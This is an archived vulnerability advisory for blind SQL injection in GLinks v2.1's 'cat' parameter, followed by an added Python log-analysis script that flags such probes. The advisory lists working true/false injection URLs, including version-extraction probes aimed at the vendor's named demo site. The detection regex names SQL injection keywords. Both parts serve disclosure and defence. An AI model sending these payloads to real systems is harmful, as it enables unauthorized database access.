Vendor: GLinks
By: 599eme Man
CVSS: 7.5 (HIGH)
CWE: 89 (Blind SQL Injection)
Product Name: GLinks
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:groonesworld:glinks:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability

GLinks v2.1 is vulnerable to blind SQL injection through the 'cat' parameter of the 'index.php' script. An attacker can inject arbitrary SQL into this parameter and have it executed on the vulnerable system. This can be exploited to gain access to the vulnerable system and to sensitive data stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of GLinks v2.1.

Exploit-DB raw data:

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________



# [+] GLinks v2.1 (cat) Remote Blind SQL Injection Vulnerability
# [+] Software : President Bios
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special Thanks : Moudi Aka SixSo  brozazaaaaaaaaa
# [+] Download : http://www.groonesworld.com/programs/glinks/glinks.zip
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#	[+] Blind SQL
#
#		- http://www.site.com/index.php?cat=[nr] and 1=1 <= true
#		- http://www.site.com/index.php?cat=[nr] and 1=2 <= False
#
#		- http://www.site.com/index.php?cat=[nr] and substring(@@version,1,1)=4 <= false
#		- http://www.site.com/index.php?cat=[nr] and substring(@@version,1,1)=5 <= true
#
#			[+] Demo
#
#				- http://www.groonesworld.com/demos/glinks/index.php?cat=82%20and%20substring(@@version,1,1)=5 <= True
#				- http://www.groonesworld.com/demos/glinks/index.php?cat=82%20and%20substring(@@version,1,1)=4 <= False
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

# milw0rm.com [2009-07-23]
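
The true/false request pairs in the advisory above leave a recognizable trace in web server logs: a 'cat' value that is not a plain integer, followed by responses that differ depending on the injected condition. The following Python is an added example for defenders, not part of the original advisory or of GLinks. It assumes common-log-format access logs and uses response size as the visible true/false signal; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format, documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Jul/2009:10:00:01 +0000] "GET /index.php?cat=82 HTTP/1.1" 200 5120
203.0.113.9 - - [23/Jul/2009:10:00:05 +0000] "GET /index.php?cat=82%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [23/Jul/2009:10:00:06 +0000] "GET /index.php?cat=82%20and%201=2 HTTP/1.1" 200 1480
203.0.113.9 - - [23/Jul/2009:10:00:09 +0000] "GET /index.php?cat=82%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Jul/2009:10:00:12 +0000] "GET /index.php?cat=17 HTTP/1.1" 200 4890
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) [^"]*" (\d{3}) (\d+)')
SQL_HINT = re.compile(r"\b(and|or|union|select|substring|sleep)\b|@@|--|'", re.I)

def suspicious_cat_requests(log_text):
    """Return (client, cat_value, size, has_sql_hint) for every non-integer cat."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("cat", []):
            if not value.strip().isdigit():  # a category id should be digits only
                hits.append((client, value, int(size), bool(SQL_HINT.search(value))))
    return hits

def blind_probe_clients(hits):
    """Clients whose injected conditions produced differing response sizes,
    i.e. the true/false oracle that blind SQL injection depends on (assumed signal)."""
    sizes = defaultdict(set)
    for client, _value, size, has_hint in hits:
        if has_hint:
            sizes[client].add(size)
    return sorted(c for c, s in sizes.items() if len(s) > 1)

if __name__ == "__main__":
    found = suspicious_cat_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("oracle observed for:", blind_probe_clients(found))
```

The same digits-only check, applied in the application before 'cat' reaches the query, rejects every probe listed in the advisory.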